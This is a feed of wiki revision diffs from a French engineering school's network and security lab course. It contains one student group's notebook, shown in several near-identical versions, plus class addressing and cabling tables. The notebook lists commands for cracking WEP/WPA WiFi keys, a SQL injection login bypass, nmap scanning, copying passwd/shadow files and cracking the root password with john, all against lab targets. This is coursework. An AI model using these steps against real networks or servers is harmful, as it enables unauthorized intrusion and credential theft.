		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54085"/>
				<updated>2020-11-30T15:16:54Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 5.3 */ ls usb&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
25===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54084</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54084"/>
				<updated>2020-11-30T15:11:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
25===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54080</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54080"/>
				<updated>2020-11-30T15:03:17Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
===Installation de la machine virtuelle===&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53001</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53001"/>
				<updated>2020-11-02T14:17:36Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| 192.168.222.&lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.3&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| &lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| &lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| &lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| &lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| &lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| &lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| &lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| &lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| &lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
